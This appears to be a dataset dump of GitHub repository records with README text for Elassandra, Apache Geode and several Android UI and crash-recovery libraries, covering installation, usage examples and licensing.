now.get(Calendar.MINUTE), - false - ); -tpd.show(getFragmentManager(), ""Timepickerdialog""); -``` - -For other documentation regarding theming , handling orientation changes , and callbacks - check out the original documentation - https://github.com/wdullaer/MaterialDateTimePicker",0 -strapdata/elassandra,Elassandra = Elasticsearch + Apache Cassandra,2015-08-22T13:52:08Z,,"# Elassandra [![Build Status](https://travis-ci.org/strapdata/elassandra.svg)](https://travis-ci.org/strapdata/elassandra) [![Documentation Status](https://readthedocs.org/projects/elassandra/badge/?version=latest)](https://elassandra.readthedocs.io/en/latest/?badge=latest) [![GitHub release](https://img.shields.io/github/v/release/strapdata/elassandra.svg)](https://github.com/strapdata/elassandra/releases/latest) -[![Twitter](https://img.shields.io/twitter/follow/strapdataio?style=social)](https://twitter.com/strapdataio) - -![Elassandra Logo](elassandra-logo.png) - -## [http://www.elassandra.io/](http://www.elassandra.io/) - -Elassandra is an [Apache Cassandra](http://cassandra.apache.org) distribution including an [Elasticsearch](https://github.com/elastic/elasticsearch) search engine. -Elassandra is a multi-master multi-cloud database and search engine with support for replicating across multiple datacenters in active/active mode. - -Elasticsearch code is embedded in Cassanda nodes providing advanced search features on Cassandra tables and Cassandra serves as an Elasticsearch data and configuration store. - -![Elassandra architecture](/docs/elassandra/source/images/elassandra1.jpg) - -Elassandra supports Cassandra vnodes and scales horizontally by adding more nodes without the need to reshard indices. - -Project documentation is available at [doc.elassandra.io](http://doc.elassandra.io). - -## Benefits of Elassandra - -For Cassandra users, elassandra provides Elasticsearch features : -* Cassandra updates are indexed in Elasticsearch. -* Full-text and spatial search on your Cassandra data. -* Real-time aggregation (does not require Spark or Hadoop to GROUP BY) -* Provide search on multiple keyspaces and tables in one query. -* Provide automatic schema creation and support nested documents using [User Defined Types](https://docs.datastax.com/en/cql/3.1/cql/cql_using/cqlUseUDT.html). -* Provide read/write JSON REST access to Cassandra data. -* Numerous Elasticsearch plugins and products like [Kibana](https://www.elastic.co/guide/en/kibana/current/introduction.html). -* Manage concurrent elasticsearch mappings changes and applies batched atomic CQL schema changes. -* Support [Elasticsearch ingest processors](https://www.elastic.co/guide/en/elasticsearch/reference/master/ingest.html) allowing to transform input data. - -For Elasticsearch users, elassandra provides useful features : -* Elassandra is masterless. Cluster state is managed through [cassandra lightweight transactions](http://www.datastax.com/dev/blog/lightweight-transactions-in-cassandra-2-0). -* Elassandra is a sharded multi-master database, where Elasticsearch is sharded master-slave. Thus, Elassandra has no Single Point Of Write, helping to achieve high availability. -* Elassandra inherits Cassandra data repair mechanisms (hinted handoff, read repair and nodetool repair) providing support for **cross datacenter replication**. -* When adding a node to an Elassandra cluster, only data pulled from existing nodes are re-indexed in Elasticsearch. -* Cassandra could be your unique datastore for indexed and non-indexed data. It's easier to manage and secure. Source documents are now stored in Cassandra, reducing disk space if you need a NoSQL database and Elasticsearch. -* Write operations are not restricted to one primary shard, but distributed across all Cassandra nodes in a virtual datacenter. The number of shards does not limit your write throughput. Adding elassandra nodes increases both read and write throughput. -* Elasticsearch indices can be replicated among many Cassandra datacenters, allowing write to the closest datacenter and search globally. -* The [cassandra driver](http://www.planetcassandra.org/client-drivers-tools/) is Datacenter and Token aware, providing automatic load-balancing and failover. -* Elassandra efficiently stores Elasticsearch documents in binary SSTables without any JSON overhead. - -## Quick start - -* [Quick Start](http://doc.elassandra.io/en/latest/quickstart.html) guide to run a single node Elassandra cluster in docker. -* [Deploy Elassandra by launching a Google Kubernetes Engine](./docs/google-kubernetes-tutorial.md): - - [![Open in Cloud Shell](https://gstatic.com/cloudssh/images/open-btn.png)](https://console.cloud.google.com/cloudshell/open?git_repo=https://github.com/strapdata/elassandra-google-k8s-marketplace&tutorial=docs/google-kubernetes-tutorial.md) - -## Upgrade Instructions - - -#### Elassandra 6.8.4.2+ - -<<<<<<< HEAD -Since version 6.8.4.2, the gossip X1 application state can be compressed using a system property. Enabling this settings allows the creation of a lot of virtual indices. -Before enabling this setting, upgrade all the 6.8.4.x nodes to the 6.8.4.2 (or higher). Once all the nodes are in 6.8.4.2, they are able to decompress the application state even if the settings isn't yet configured locally. - -#### Elassandra 6.2.3.25+ - -Elassandra use the Cassandra GOSSIP protocol to manage the Elasticsearch routing table and Elassandra 6.8.4.2+ add support for compression of -the X1 application state to increase the maxmimum number of Elasticsearch indices. For backward compatibility, the compression is disabled by default, -but once all your nodes are upgraded into version 6.8.4.2+, you should enable the X1 compression by adding **-Des.compress_x1=true** in your **conf/jvm.options** and rolling restart all nodes. -Nodes running version 6.8.4.2+ are able to read compressed and not compressed X1. - -#### Elassandra 6.2.3.21+ - -Before version 6.2.3.21, the Cassandra replication factor for the **elasic_admin** keyspace (and elastic_admin_[datacenter.group]) was automatically adjusted to the -number of nodes of the datacenter. Since version 6.2.3.21 and because it has a performance impact on large clusters, it's now up to your Elassandra administrator to -properly adjust the replication factor for this keyspace. Keep in mind that Elasticsearch mapping updates rely on a PAXOS transaction that requires QUORUM nodes to succeed, -so replication factor should be at least 3 on each datacenter. - -#### Elassandra 6.2.3.19+ - -Elassandra 6.2.3.19 metadata version now relies on the Cassandra table **elastic_admin.metadata_log** (that was **elastic_admin.metadata** from 6.2.3.8 to 6.2.3.18) -to keep the elasticsearch mapping update history and automatically recover from a possible PAXOS write timeout issue. - -When upgrading the first node of a cluster, Elassandra automatically copy the current **metadata.version** into the new **elastic_admin.metadata_log** table. -To avoid Elasticsearch mapping inconsistency, you must avoid mapping update while the rolling upgrade is in progress. Once all nodes are upgraded, -the **elastic_admin.metadata** is not more used and can be removed. Then, you can get the mapping update history from the new **elastic_admin.metadata_log** and know -which node has updated the mapping, when and for which reason. - -#### Elassandra 6.2.3.8+ - -Elassandra 6.2.3.8+ now fully manages the elasticsearch mapping in the CQL schema through the use of CQL schema extensions (see *system_schema.tables*, column *extensions*). These table extensions and the CQL schema updates resulting of elasticsearch index creation/modification are updated in batched atomic schema updates to ensure consistency when concurrent updates occurs. Moreover, these extensions are stored in binary and support partial updates to be more efficient. As the result, the elasticsearch mapping is not more stored in the *elastic_admin.metadata* table. - -WARNING: During the rolling upgrade, elasticserach mapping changes are not propagated between nodes running the new and the old versions, so don't change your mapping while you're upgrading. Once all your nodes have been upgraded to 6.2.3.8+ and validated, apply the following CQL statements to remove useless elasticsearch metadata: -```bash -ALTER TABLE elastic_admin.metadata DROP metadata; -ALTER TABLE elastic_admin.metadata WITH comment = ''; -``` - -WARNING: Due to CQL table extensions used by Elassandra, some old versions of **cqlsh** may lead to the following error message **""'module' object has no attribute 'viewkeys'.""**. This comes from the old python cassandra driver embedded in Cassandra and has been reported in [CASSANDRA-14942](https://issues.apache.org/jira/browse/CASSANDRA-14942). Possible workarounds: -* Use the **cqlsh** embedded with Elassandra -* Install a recent version of the **cqlsh** utility (*pip install cqlsh*) or run it from a docker image: - -```bash -docker run -it --rm strapdata/cqlsh:0.1 node.example.com -``` - -#### Elassandra 6.x changes - -* Elasticsearch now supports only one document type per index backed by one Cassandra table. Unless you specify an elasticsearch type name in your mapping, data is stored in a cassandra table named **""_doc""**. If you want to search many cassandra tables, you now need to create and search many indices. -* Elasticsearch 6.x manages shard consistency through several metadata fields (_primary_term, _seq_no, _version) that are not used in elassandra because replication is fully managed by cassandra. - -## Installation - -Ensure Java 8 is installed and `JAVA_HOME` points to the correct location. - -* [Download](https://github.com/strapdata/elassandra/releases) and extract the distribution tarball -* Define the CASSANDRA_HOME environment variable : `export CASSANDRA_HOME=` -* Run `bin/cassandra -e` -* Run `bin/nodetool status` -* Run `curl -XGET localhost:9200/_cluster/state` - -#### Example - -Try indexing a document on a non-existing index: - -```bash -curl -XPUT 'http://localhost:9200/twitter/_doc/1?pretty' -H 'Content-Type: application/json' -d '{ - ""user"": ""Poulpy"", - ""post_date"": ""2017-10-04T13:12:00Z"", - ""message"": ""Elassandra adds dynamic mapping to Cassandra"" -}' -``` - -Then look-up in Cassandra: - -```bash -bin/cqlsh -e ""SELECT * from twitter.\""_doc\"""" -``` - -Behind the scenes, Elassandra has created a new Keyspace `twitter` and table `_doc`. - -```CQL -admin@cqlsh>DESC KEYSPACE twitter; - -CREATE KEYSPACE twitter WITH replication = {'class': 'NetworkTopologyStrategy', 'DC1': '1'} AND durable_writes = true; - -CREATE TABLE twitter.""_doc"" ( - ""_id"" text PRIMARY KEY, - message list, - post_date list, - user list -) WITH bloom_filter_fp_chance = 0.01 - AND caching = {'keys': 'ALL', 'rows_per_partition': 'NONE'} - AND comment = '' - AND compaction = {'class': 'org.apache.cassandra.db.compaction.SizeTieredCompactionStrategy', 'max_threshold': '32', 'min_threshold': '4'} - AND compression = {'chunk_length_in_kb': '64', 'class': 'org.apache.cassandra.io.compress.LZ4Compressor'} - AND crc_check_chance = 1.0 - AND dclocal_read_repair_chance = 0.1 - AND default_time_to_live = 0 - AND gc_grace_seconds = 864000 - AND max_index_interval = 2048 - AND memtable_flush_period_in_ms = 0 - AND min_index_interval = 128 - AND read_repair_chance = 0.0 - AND speculative_retry = '99PERCENTILE'; -CREATE CUSTOM INDEX elastic__doc_idx ON twitter.""_doc"" () USING 'org.elassandra.index.ExtendedElasticSecondaryIndex'; -``` - -By default, multi valued Elasticsearch fields are mapped to Cassandra list. -Now, insert a row with CQL : - -```CQL -INSERT INTO twitter.""_doc"" (""_id"", user, post_date, message) -VALUES ( '2', ['Jimmy'], [dateof(now())], ['New data is indexed automatically']); -SELECT * FROM twitter.""_doc""; - - _id | message | post_date | user ------+--------------------------------------------------+-------------------------------------+------------ - 2 | ['New data is indexed automatically'] | ['2019-07-04 06:00:21.893000+0000'] | ['Jimmy'] - 1 | ['Elassandra adds dynamic mapping to Cassandra'] | ['2017-10-04 13:12:00.000000+0000'] | ['Poulpy'] - -(2 rows) -``` - -Then search for it with the Elasticsearch API: - -```bash -curl ""localhost:9200/twitter/_search?q=user:Jimmy&pretty"" -``` - -And here is a sample response : - -```JSON -{ - ""took"" : 3, - ""timed_out"" : false, - ""_shards"" : { - ""total"" : 1, - ""successful"" : 1, - ""skipped"" : 0, - ""failed"" : 0 - }, - ""hits"" : { - ""total"" : 1, - ""max_score"" : 0.6931472, - ""hits"" : [ - { - ""_index"" : ""twitter"", - ""_type"" : ""_doc"", - ""_id"" : ""2"", - ""_score"" : 0.6931472, - ""_source"" : { - ""post_date"" : ""2019-07-04T06:00:21.893Z"", - ""message"" : ""New data is indexed automatically"", - ""user"" : ""Jimmy"" - } - } - ] - } -} -``` - -## Support - - * Commercial support is available through [Strapdata](http://www.strapdata.com/). - * Community support available via [elassandra google groups](https://groups.google.com/forum/#!forum/elassandra). - * Post feature requests and bugs on https://github.com/strapdata/elassandra/issues - -## License - -``` -This software is licensed under the Apache License, version 2 (""ALv2""), quoted below. - -Copyright 2015-2018, Strapdata (contact@strapdata.com). - -Licensed under the Apache License, Version 2.0 (the ""License""); you may not -use this file except in compliance with the License. You may obtain a copy of -the License at - - http://www.apache.org/licenses/LICENSE-2.0 - -Unless required by applicable law or agreed to in writing, software -distributed under the License is distributed on an ""AS IS"" BASIS, WITHOUT -WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the -License for the specific language governing permissions and limitations under -the License. -``` - -## Acknowledgments - -* Elasticsearch, Logstash, Beats and Kibana are trademarks of Elasticsearch BV, registered in the U.S. and in other countries. -* Apache Cassandra, Apache Lucene, Apache, Lucene and Cassandra are trademarks of the Apache Software Foundation. -* Elassandra is a trademark of Strapdata SAS. -",0 -dongjunkun/DropDownMenu,一个实用的多条件筛选菜单,2015-06-23T07:43:56Z,,"[![](https://jitpack.io/v/dongjunkun/DropDownMenu.svg)](https://jitpack.io/#dongjunkun/DropDownMenu) - -## 简介 -一个实用的多条件筛选菜单,在很多App上都能看到这个效果,如美团,爱奇艺电影票等 - -我的博客 [自己造轮子--android常用多条件帅选菜单实现思路(类似美团,爱奇艺电影票下拉菜单)](http://www.jianshu.com/p/d9407f799d2d) - -## 特色 - - 支持多级菜单 - - 你可以完全自定义你的菜单样式,我这里只是封装了一些实用的方法,Tab的切换效果,菜单显示隐藏效果等 - - 并非用popupWindow实现,无卡顿 - -## ScreenShot - - -Download APK - -或者扫描二维码 - - - -## Gradle Dependency - -``` -allprojects { - repositories { - ... - maven { url ""https://jitpack.io"" } - } -} - -dependencies { - compile 'com.github.dongjunkun:DropDownMenu:1.0.4' -} -``` - -## 使用 -添加DropDownMenu 到你的布局文件,如下 -``` - -``` -我们只需要在java代码中调用下面的代码 - -``` - //tabs 所有标题,popupViews 所有菜单,contentView 内容 -mDropDownMenu.setDropDownMenu(tabs, popupViews, contentView); -``` -如果你要了解更多,可以直接看源码 Example - -> 建议拷贝代码到项目中使用,拷贝DropDownMenu.java 以及res下的所有文件即可 - -## 关于我 -简书[dongjunkun](http://www.jianshu.com/users/f07458c1a8f3/latest_articles) -",0 -DingMouRen/PaletteImageView,"懂得智能配色的ImageView,还能给自己设置多彩的阴影哦。(Understand the intelligent color matching ImageView, but also to set their own colorful shadow Oh!)",2017-04-25T12:05:08Z,,"![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/p1.png)  - -### English Readme -[English Version](https://github.com/hasanmohdkhan/PaletteImageView/blob/master/README%20English.md) -(Thank you, [hasanmohdkhan](https://github.com/hasanmohdkhan)) - -### 简介 -* 可以解析图片中的主色调,**默认将主色调作为控件阴影的颜色** -* 可以**自定义设置控件的阴影颜色** -* 可以**控制控件四个角的圆角大小**(如果控件设置成正方向,随着圆角半径增大,可以将控件变成圆形) -* 可以**控制控件的阴影半径大小** -* 可以分别**控制阴影在x方向和y方向上的偏移量** -* 可以将图片中的颜色解析出**六种主题颜色**,每一种主题颜色都有相应的**匹配背景、标题、正文的推荐颜色** - - -### build.gradle中引用 -``` - compile 'com.dingmouren.paletteimageview:paletteimageview:1.0.7' -``` -                 ![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/title.gif) -##### 1.参数的控制 -圆角半径|阴影模糊范围|阴影偏移量 ----|---|--- -![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/demo1.gif) | ![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/demo2.gif) | ![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/demo3.gif) - -##### 2.阴影颜色默认是图片的主色调 - -                   ![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/demo4.gif) -![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/p2.png) -##### 3.图片颜色主题解析 -![image](https://github.com/DingMouRen/PaletteImageView/raw/master/screenshot/p3.png) -### 使用 - -``` - - mPaletteImageView.setOnParseColorListener(new PaletteImageView.OnParseColorListener() { - @Override//解析图片的颜色完毕 - public void onComplete(PaletteImageView paletteImageView) { - int[] vibrant = paletteImageView.getVibrantColor(); - int[] vibrantDark = paletteImageView.getDarkVibrantColor(); - int[] vibrantLight = paletteImageView.getLightVibrantColor(); - int[] muted = paletteImageView.getMutedColor(); - int[] mutedDark = paletteImageView.getDarkMutedColor(); - int[] mutedLight = paletteImageView.getLightMutedColor(); - } - - @Override//解析图片的颜色失败 - public void onFail() { - - } - }); -``` -### xml属性 - -xml属性 | 描述 ----|--- - app:palettePadding | **表示阴影显示最大空间距离。值为0,没有阴影,大于0,才有阴影。** - app:paletteOffsetX | 表示阴影在x方向上的偏移量 - app:paletteOffsetY | 表示阴影在y方向上的偏移量 - app:paletteSrc | 表示图片资源 - app:paletteRadius | 表示圆角半径 - app:paletteShadowRadius | 表示阴影模糊范围 -### 公共的方法 -方法 | 描述 ----|--- -public void setShadowColor(int color) | 表示自定义设置控件阴影的颜色 - public void setBitmap(Bitmap bitmap) | 表示设置控件位图 - public void setPaletteRadius(int raius) | 表示设置控件圆角半径 - public void setPaletteShadowOffset(int offsetX, int offsetY) | 表示设置阴影在控件阴影在x方向 或 y方向上的偏移量 - public void setPaletteShadowRadius(int radius) | 表示设置控件阴影模糊范围 - public void setOnParseColorListener(OnParseColorListener listener) | 设置控件解析图片颜色的监听器 - public int[] getVibrantColor() | 表示获取Vibrant主题的颜色数组;假设颜色数组为arry,arry[0]是推荐标题使用的颜色,arry[1]是推荐正文使用的颜色,arry[2]是推荐背景使用的颜色。颜色只是用于推荐,可以自行选择 - public int[] getDarkVibrantColor()| 表示获取DarkVibrant主题的颜色数组,数组元素含义同上 - public int[] getLightVibrantColor()| 表示获取LightVibrant主题的颜色数组,数组元素含义同上 - public int[] getMutedColor()| 表示获取Muted主题的颜色数组,数组元素含义同上 - public int[] getDarkMutedColor()| 表示获取DarkMuted主题的颜色数组,数组元素含义同上 - public int[] getLightMutedColor()| 表示获取LightMuted主题的颜色数组,数组元素含义同上 - -
此项目已暂停维护
- - -",0 -apache/geode,Apache Geode,2015-04-30T07:00:05Z,,"
- -[![Apache Geode logo](https://geode.apache.org/img/Apache_Geode_logo.png)](http://geode.apache.org) - -[![Build Status](https://concourse.apachegeode-ci.info/api/v1/teams/main/pipelines/apache-develop-main/badge)](https://concourse.apachegeode-ci.info/teams/main/pipelines/apache-develop-main) [![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://www.apache.org/licenses/LICENSE-2.0) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/org.apache.geode/geode-core/badge.svg)](http://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.apache.geode%22) [![homebrew](https://img.shields.io/homebrew/v/apache-geode.svg)](https://formulae.brew.sh/formula/apache-geode) [![Docker Pulls](https://img.shields.io/docker/pulls/apachegeode/geode.svg)](https://hub.docker.com/r/apachegeode/geode/) [![Total alerts](https://img.shields.io/lgtm/alerts/g/apache/geode.svg?logo=lgtm&logoWidth=18)](https://lgtm.com/projects/g/apache/geode/alerts/) [![Language grade: Java](https://img.shields.io/lgtm/grade/java/g/apache/geode.svg?logo=lgtm&logoWidth=18)](https://lgtm.com/projects/g/apache/geode/context:java) [![Language grade: JavaScript](https://img.shields.io/lgtm/grade/javascript/g/apache/geode.svg?logo=lgtm&logoWidth=18)](https://lgtm.com/projects/g/apache/geode/context:javascript) [![Language grade: Python](https://img.shields.io/lgtm/grade/python/g/apache/geode.svg?logo=lgtm&logoWidth=18)](https://lgtm.com/projects/g/apache/geode/context:python) - -
- -## Contents - -1. [Overview](#overview) -2. [How to Get Apache Geode](#obtaining) -3. [Main Concepts and Components](#concepts) -4. [Location of Directions for Building from Source](#building) -5. [Geode in 5 minutes](#started) -6. [Application Development](#development) -7. [Documentation](https://geode.apache.org/docs/) -8. [Wiki](https://cwiki.apache.org/confluence/display/GEODE/Index) -9. [How to Contribute](https://cwiki.apache.org/confluence/display/GEODE/How+to+Contribute) -10. [Export Control](#export) - -## Overview - -[Apache Geode](http://geode.apache.org/) is -a data management platform that provides real-time, consistent access to -data-intensive applications throughout widely distributed cloud architectures. - -Apache Geode pools memory, CPU, network resources, and optionally local disk -across multiple processes to manage application objects and behavior. It uses -dynamic replication and data partitioning techniques to implement high -availability, improved performance, scalability, and fault tolerance. In -addition to being a distributed data container, Apache Geode is an in-memory -data management system that provides reliable asynchronous event notifications -and guaranteed message delivery. - -Apache Geode is a mature, robust technology originally developed by GemStone -Systems. Commercially available as GemFire™, it was first deployed in the -financial sector as the transactional, low-latency data engine used in Wall -Street trading platforms. Today Apache Geode technology is used by hundreds of -enterprise customers for high-scale business applications that must meet low -latency and 24x7 availability requirements. - -## How to Get Apache Geode - -You can download Apache Geode from the -[website](https://geode.apache.org/releases/), run a Docker -[image](https://hub.docker.com/r/apachegeode/geode/), or install with -[Homebrew](https://formulae.brew.sh/formula/apache-geode) on OSX. Application developers -can load dependencies from [Maven -Central](https://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.apache.geode%22). - -Maven -```xml - - - org.apache.geode - geode-core - $VERSION - - -``` - -Gradle -```groovy -dependencies { - compile ""org.apache.geode:geode-core:$VERSION"" -} -``` - -## Main Concepts and Components - -_Caches_ are an abstraction that describe a node in an Apache Geode distributed -system. - -Within each cache, you define data _regions_. Data regions are analogous to -tables in a relational database and manage data in a distributed fashion as -name/value pairs. A _replicated_ region stores identical copies of the data on -each cache member of a distributed system. A _partitioned_ region spreads the -data among cache members. After the system is configured, client applications -can access the distributed data in regions without knowledge of the underlying -system architecture. You can define listeners to receive notifications when -data has changed, and you can define expiration criteria to delete obsolete -data in a region. - -_Locators_ provide clients with both discovery and server load balancing -services. Clients are configured with locator information, and the locators -maintain a dynamic list of member servers. The locators provide clients with -connection information to a server. - -Apache Geode includes the following features: - -* Combines redundancy, replication, and a ""shared nothing"" persistence - architecture to deliver fail-safe reliability and performance. -* Horizontally scalable to thousands of cache members, with multiple cache - topologies to meet different enterprise needs. The cache can be - distributed across multiple computers. -* Asynchronous and synchronous cache update propagation. -* Delta propagation distributes only the difference between old and new - versions of an object (delta) instead of the entire object, resulting in - significant distribution cost savings. -* Reliable asynchronous event notifications and guaranteed message delivery - through optimized, low latency distribution layer. -* Data awareness and real-time business intelligence. If data changes as - you retrieve it, you see the changes immediately. -* Integration with Spring Framework to speed and simplify the development - of scalable, transactional enterprise applications. -* JTA compliant transaction support. -* Cluster-wide configurations that can be persisted and exported to other - clusters. -* Remote cluster management through HTTP. -* REST APIs for REST-enabled application development. -* Rolling upgrades may be possible, but they will be subject to any - limitations imposed by new features. - -## Building this Release from Source - -See [BUILDING.md](./BUILDING.md) for -instructions on how to build the project. - -## Running Tests -See [TESTING.md](./TESTING.md) for -instructions on how to run tests. - -## Geode in 5 minutes - -Geode requires installation of JDK version 1.8. After installing Apache Geode, -start a locator and server: -```console -$ gfsh -gfsh> start locator -gfsh> start server -``` - -Create a region: -```console -gfsh> create region --name=hello --type=REPLICATE -``` - -Write a client application (this example uses a [Gradle](https://gradle.org) -build script): - -_build.gradle_ -```groovy -apply plugin: 'java' -apply plugin: 'application' - -mainClassName = 'HelloWorld' - -repositories { mavenCentral() } -dependencies { - compile 'org.apache.geode:geode-core:1.4.0' - runtime 'org.slf4j:slf4j-log4j12:1.7.24' -} -``` - -_src/main/java/HelloWorld.java_ -```java -import java.util.Map; -import org.apache.geode.cache.Region; -import org.apache.geode.cache.client.*; - -public class HelloWorld { - public static void main(String[] args) throws Exception { - ClientCache cache = new ClientCacheFactory() - .addPoolLocator(""localhost"", 10334) - .create(); - Region region = cache - .createClientRegionFactory(ClientRegionShortcut.CACHING_PROXY) - .create(""hello""); - - region.put(""1"", ""Hello""); - region.put(""2"", ""World""); - - for (Map.Entry entry : region.entrySet()) { - System.out.format(""key = %s, value = %s\n"", entry.getKey(), entry.getValue()); - } - cache.close(); - } -} -``` - -Build and run the `HelloWorld` example: -```console -$ gradle run -``` - -The application will connect to the running cluster, create a local cache, put -some data in the cache, and print the cached data to the console: -```console -key = 1, value = Hello -key = 2, value = World -``` - -Finally, shutdown the Geode server and locator: -```console -gfsh> shutdown --include-locators=true -``` - -For more information see the [Geode -Examples](https://github.com/apache/geode-examples) repository or the -[documentation](https://geode.apache.org/docs/). - -## Application Development - -Apache Geode applications can be written in these client technologies: - -* Java [client](https://geode.apache.org/docs/guide/18/topologies_and_comm/cs_configuration/chapter_overview.html) - or [peer](https://geode.apache.org/docs/guide/18/topologies_and_comm/p2p_configuration/chapter_overview.html) -* [REST](https://geode.apache.org/docs/guide/18/rest_apps/chapter_overview.html) -* [Memcached](https://cwiki.apache.org/confluence/display/GEODE/Moving+from+memcached+to+gemcached) - -The following libraries are available external to the Apache Geode project: - -* [Spring Data GemFire](https://projects.spring.io/spring-data-gemfire/) -* [Spring Cache](https://docs.spring.io/spring/docs/current/spring-framework-reference/html/cache.html) -* [Python](https://github.com/gemfire/py-gemfire-rest) - -## Export Control - -This distribution includes cryptographic software. -The country in which you currently reside may have restrictions -on the import, possession, use, and/or re-export to another country, -of encryption software. BEFORE using any encryption software, -please check your country's laws, regulations and policies -concerning the import, possession, or use, and re-export of -encryption software, to see if this is permitted. -See for more information. - -The U.S. Government Department of Commerce, Bureau of Industry and Security (BIS), -has classified this software as Export Commodity Control Number (ECCN) 5D002.C.1, -which includes information security software using or performing -cryptographic functions with asymmetric algorithms. -The form and manner of this Apache Software Foundation distribution makes -it eligible for export under the License Exception -ENC Technology Software Unrestricted (TSU) exception -(see the BIS Export Administration Regulations, Section 740.13) -for both object code and source code. - -The following provides more details on the included cryptographic software: - -* Apache Geode is designed to be used with - [Java Secure Socket Extension](https://docs.oracle.com/javase/8/docs/technotes/guides/security/jsse/JSSERefGuide.html) (JSSE) and - [Java Cryptography Extension](https://docs.oracle.com/javase/8/docs/technotes/guides/security/crypto/CryptoSpec.html) (JCE). - The [JCE Unlimited Strength Jurisdiction Policy](https://www.oracle.com/technetwork/java/javase/downloads/jce8-download-2133166.html) - may need to be installed separately to use keystore passwords with 7 or more characters. -* Apache Geode links to and uses [OpenSSL](https://www.openssl.org/) ciphers. - -",0 -Sunzxyong/Recovery,a crash recovery framework.(一个App异常恢复框架),2016-09-04T08:13:19Z,,"# **Recovery** -A crash recovery framework! - ----- - -[ ![Download](https://api.bintray.com/packages/sunzxyong/maven/Recovery/images/download.svg) ](https://bintray.com/sunzxyong/maven/Recovery/_latestVersion) ![build](https://img.shields.io/badge/build-passing-blue.svg) [![License](https://img.shields.io/hexpm/l/plug.svg)](https://github.com/Sunzxyong/Recovery/blob/master/LICENSE) - -[中文文档](https://github.com/Sunzxyong/Recovery/blob/master/README-Chinese.md) - -# **Introduction** - -[Blog entry with introduction](http://zhengxiaoyong.com/2016/09/05/Android%E8%BF%90%E8%A1%8C%E6%97%B6Crash%E8%87%AA%E5%8A%A8%E6%81%A2%E5%A4%8D%E6%A1%86%E6%9E%B6-Recovery) - -“Recovery” can help you to automatically handle application crash in runtime. It provides you with following functionality: - -* Automatic recovery activity with stack and data; -* Ability to recover to the top activity; -* A way to view and save crash info; -* Ability to restart and clear the cache; -* Allows you to do a restart instead of recovering if failed twice in one minute. - -# **Art** -![recovery](http://7xswxf.com2.z0.glb.qiniucdn.com//blog/recovery.jpg) - -# **Usage** -## **Installation** -**Using Gradle** - -```gradle - implementation 'com.zxy.android:recovery:1.0.0' -``` - -or - -```gradle - debugImplementation 'com.zxy.android:recovery:1.0.0' - releaseImplementation 'com.zxy.android:recovery-no-op:1.0.0' -``` - - -**Using Maven** - -```xml - - com.zxy.android - recovery - 1.0.0 - pom - -``` - -## **Initialization** -You can use this code sample to initialize Recovery in your application: - -```java - Recovery.getInstance() - .debug(true) - .recoverInBackground(false) - .recoverStack(true) - .mainPage(MainActivity.class) - .recoverEnabled(true) - .callback(new MyCrashCallback()) - .silent(false, Recovery.SilentMode.RECOVER_ACTIVITY_STACK) - .skip(TestActivity.class) - .init(this); -``` - -If you don't want to show the RecoveryActivity when the application crash in runtime,you can use silence recover to restore your application. - -You can use this code sample to initialize Recovery in your application: - -```java - Recovery.getInstance() - .debug(true) - .recoverInBackground(false) - .recoverStack(true) - .mainPage(MainActivity.class) - .recoverEnabled(true) - .callback(new MyCrashCallback()) - .silent(true, Recovery.SilentMode.RECOVER_ACTIVITY_STACK) - .skip(TestActivity.class) - .init(this); -``` - -If you only need to display 'RecoveryActivity' page in development to obtain the debug data, and in the online version does not display, you can set up `recoverEnabled(false);` - -## **Arguments** - -| Argument | Type | Function | -| :-: | :-: | :-: | -| debug | boolean | Whether to open the debug mode | -| recoverInBackgroud | boolean | When the App in the background, whether to restore the stack | -| recoverStack | boolean | Whether to restore the activity stack, or to restore the top activity | -| mainPage | Class | Initial page activity | -| callback | RecoveryCallback | Crash info callback | -| silent | boolean,SilentMode | Whether to use silence recover,if true it will not display RecoveryActivity and restore the activity stack automatically | - -**SilentMode** -> 1. RESTART - Restart App -> 2. RECOVER_ACTIVITY_STACK - Restore the activity stack -> 3. RECOVER_TOP_ACTIVITY - Restore the top activity -> 4. RESTART_AND_CLEAR - Restart App and clear data - -## **Callback** - -```java -public interface RecoveryCallback { - - void stackTrace(String stackTrace); - - void cause(String cause); - - void exception( - String throwExceptionType, - String throwClassName, - String throwMethodName, - int throwLineNumber - ); - - void throwable(Throwable throwable); -} -``` - -## **Custom Theme** - -You can customize UI by setting these properties in your styles file: - -```xml - #2E2E36 - #2E2E36 - #BDBDBD - #3C4350 - #FFFFFF - #C6C6C6 -``` - -## **Crash File Path** -> {SDCard Dir}/Android/data/{packageName}/files/recovery_crash/ - ----- -## **Update history** -* `VERSION-0.0.5`——**Support silent recovery** -* `VERSION-0.0.6`——**Strengthen the protection of silent restore mode** -* `VERSION-0.0.7`——**Add confusion configuration** -* `VERSION-0.0.8`——**Add the skip Activity features,method:skip()** -* `VERSION-0.0.9`——**Update the UI and solve some problems** -* `VERSION-0.1.0`——**Optimization of crash exception delivery, initial Recovery framework can be in any position, release the official version-0.1.0** -* `VERSION-0.1.3`——**Add 'no-op' support** -* `VERSION-0.1.4`——**update default theme** -* `VERSION-0.1.5`——**fix 8.0+ hook bug** -* `VERSION-0.1.6`——**update** -* `VERSION-1.0.0`——**Fix 8.0 compatibility issue** - -## **About** -* **Blog**:[https://zhengxiaoyong.com](https://zhengxiaoyong.com) -* **Wechat**: - -![](https://raw.githubusercontent.com/Sunzxyong/ImageRepository/master/qrcode.jpg) -# **LICENSE** - -``` - Copyright 2016 zhengxiaoyong - - Licensed under the Apache License, Version 2.0 (the ""License""); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an ""AS IS"" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. -``` - -",0 -hanks-zyh/SmallBang, twitter like animation for any view :heartbeat:,2015-12-24T14:48:37Z,,"# SmallBang - -twitter like animation for any view :heartbeat: - - - -[Demo 